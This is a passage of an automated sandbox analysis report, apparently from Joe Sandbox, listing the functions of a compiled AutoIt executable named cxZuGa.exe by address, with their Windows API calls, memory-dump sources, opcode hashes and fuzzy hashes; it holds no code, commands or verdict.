                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                            • Instruction ID: a3a3ca20505617b2c9bdb7068b471d517602238ec6a7c8855d9ff59dec7a2942
                                                            • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                            • Instruction Fuzzy Hash: 7031F5A9A0C78146F730AB29B4007B9ABF2EB58B54F950173DA8D037A5CE3CD551C762
                                                            Function 00007FF7EC163D98 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7EC15A27B,?,?,?,00007FF7EC15A236), ref: 00007FF7EC163DB1
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7EC15A27B,?,?,?,00007FF7EC15A236), ref: 00007FF7EC163E13
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7EC15A27B,?,?,?,00007FF7EC15A236), ref: 00007FF7EC163E4D
                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7EC15A27B,?,?,?,00007FF7EC15A236), ref: 00007FF7EC163E77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID:
                                                            • API String ID: 1557788787-0
                                                            • Opcode ID: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                            • Instruction ID: 50c66f5d37336e1754f9ba9095f2f414e5d95c583ed5b20945e6c817e72a8755
                                                            • Opcode Fuzzy Hash: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                            • Instruction Fuzzy Hash: B9218065F1879181E620AF16B440229F6A5FB58FD0BC84136DB8E23BD8DF3CE452C761
                                                            Function 00007FF7EC1D108C Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                            • Instruction ID: a304b831228ff19f72edb9676a00c02e6005cef5df70f73684c264fcfd1b1e0b
                                                            • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                            • Instruction Fuzzy Hash: E531AF6AA08A45C1EB20EB16F4943B9E760FB84F95FA40232EA4D47BA8CF3CD445C711
                                                            Function 00007FF7EC1950E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                            • Instruction ID: 68784b9c7e000e47ff5002229b5d30df78a06f2752e89c8d710462a5db6510f7
                                                            • Opcode Fuzzy Hash: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                            • Instruction Fuzzy Hash: 0121B1A5B0434186EA10AF15A450378B3A2FF49FD0B894236EB5E47394EF3CE450C315
                                                            Function 00007FF7EC18D6A0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 837644225-0
                                                            • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                            • Instruction ID: 792200337a6841e490aa95aa7adacb53f9a929a594fd5268010d91329c65c146
                                                            • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                            • Instruction Fuzzy Hash: 7021F7BBA18B4186EB04EF21F4447A8B3A6FB44B95F954136CA0D07744DF3CD841C712
                                                            Function 00007FF7EC1D2264 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7EC122A54: GetWindowLongPtrW.USER32 ref: 00007FF7EC122A71
                                                            • GetClientRect.USER32(?,?,?,?,?,00007FF7EC16AA36,?,?,?,?,?,?,?,?,?,00007FF7EC1227AF), ref: 00007FF7EC1D22C4
                                                            • GetCursorPos.USER32(?,?,?,?,?,00007FF7EC16AA36,?,?,?,?,?,?,?,?,?,00007FF7EC1227AF), ref: 00007FF7EC1D22CF
                                                            • ScreenToClient.USER32 ref: 00007FF7EC1D22DD
                                                            • DefDlgProcW.USER32(?,?,?,?,?,00007FF7EC16AA36,?,?,?,?,?,?,?,?,?,00007FF7EC1227AF), ref: 00007FF7EC1D231F
                                                              • Part of subcall function 00007FF7EC1CE894: LoadCursorW.USER32 ref: 00007FF7EC1CE945
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 1626762757-0
                                                            • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                            • Instruction ID: 6b6ae01e0da3a8f5fd673af154a19a5827913ee3a76757fb396ee3302b92431a
                                                            • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                            • Instruction Fuzzy Hash: 52216079A0865286EA14EF05F480269B760FB88F81F954132EB5D47B59CF3CE940CB22
                                                            Function 00007FF7EC19CF68 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2979156933-0
                                                            • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                            • Instruction ID: 6fafccb4e8fb47be249ce2edd68795492f84f7deb0ea71a7e551fd58117939e9
                                                            • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                            • Instruction Fuzzy Hash: CC21F676A0878286E310EF26B880366FA91BB84BD4F844136E99D43B59CF7CE405C752
                                                            Function 00007FF7EC152FB8 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _ctrlfp
                                                            • String ID:
                                                            • API String ID: 697997973-0
                                                            • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                            • Instruction ID: ddca049bdca5c88b4791e98c7b7a40e97aea351ff7477b078de4cf7ae73d9903
                                                            • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                            • Instruction Fuzzy Hash: EF11C969D0CA8582E611EA3CB04127BD371EF9A7C0FE44232FB894B795DE3DE440CA11
                                                            Function 00007FF7EC1CFA78 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                            • Instruction ID: c346d90ed2b1958b0a2461c0a3177c8318d41cf176f4d929ea1f2b31bf955844
                                                            • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                            • Instruction Fuzzy Hash: D421D8BAA04B41DFEB00DF78E84469C7BB0F748B88B444826EA5893B18DB78D654CB51
                                                            Function 00007FF7EC194B28 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                            • Instruction ID: ba33dfa2f97a24c61e02e4d851c3c069e0e3c66a2097ac172d137d954c6724df
                                                            • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                            • Instruction Fuzzy Hash: BC11A7F670858282E720DF29F084369A7A1FB89B49FD44176DB4E4B648CF7CD554CB21
                                                            Function 00007FF7EC1D072C Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                            • Instruction ID: 45e64806c2a5654d005e8e06ff96cc37e63ca943ae9cbfefe470b5c9ab67d2c0
                                                            • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                            • Instruction Fuzzy Hash: 9B01F579A1839142E7006B16B808729FF60BB82B91F980136DE5907BA5CF7DD441CB11
                                                            Function 00007FF7EC15CC78 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: gfffffff
                                                            • API String ID: 3215553584-1523873471
                                                            • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                            • Instruction ID: f31d1a6c47642ed1b162621ab6ab378aa0d46541a628dedf4a23978b15ac4abf
                                                            • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                            • Instruction Fuzzy Hash: 72912AA6B0938686EB119F2DA1503B8AB95EB29BD0F548133DB8D073D5DE3DE512C312
                                                            Function 00007FF7EC191D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 3565006973-3941886329
                                                            • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                            • Instruction ID: 44b37c3336e3999c7289d5c7d4719cb3334b423605c98973045a99ecac6275cb
                                                            • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                            • Instruction Fuzzy Hash: D491397A604B4681DB24EF29E4506ADB3A5FB88F84FA18036DF4D43764EF39D899C311
                                                            Function 00007FF7EC15D0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: e+000$gfff
                                                            • API String ID: 3215553584-3030954782
                                                            • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                            • Instruction ID: 66bbf248c1b4a525531a76f8a7d0d6c0b025c29ae1a24f2cdf5dd648501b118f
                                                            • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                            • Instruction Fuzzy Hash: 47512FA6B187C146E725AF39B9413A9AB91EB81B90F88D232C79C47BD5CF3CD045C711
                                                            Function 00007FF7EC15A09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FileModuleName_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\Desktop\cxZuGa.exe
                                                            • API String ID: 3307058713-3001607027
                                                            • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                            • Instruction ID: 98aa92abdc80b800d493133a0e8a3c9694090428f515aba6149cef009486359e
                                                            • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                            • Instruction Fuzzy Hash: 5241B27AA48A5285E715EF29F8812BDA7A4FF45794B844033EA0E07745DE3CE452C321
                                                            Function 00007FF7EC1C9E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateDestroyMessageObjectSendStock
                                                            • String ID: static
                                                            • API String ID: 3467290483-2160076837
                                                            • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                            • Instruction ID: 404d14ce505df9b303635e3da7d008111426ce7800f21c135bf6ce72fc3b69bc
                                                            • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                            • Instruction Fuzzy Hash: 924149765086C2C6D674AF25F4407AEB7A0FB84791F504236EBEA03A99DB3CD481CB11
                                                            Function 00007FF7EC1B5E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 2496851823-2422070025
                                                            • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                            • Instruction ID: 2126415e3c2937759ed41f93725b0fcda3330e1d4a8d5e9c43f10cd753bd286b
                                                            • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                            • Instruction Fuzzy Hash: F331BEAAA08642C1EB14AB22E85037CE760FB54B94F858533EE5E43391DE3CD545CB22
                                                            Function 00007FF7EC1B03C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
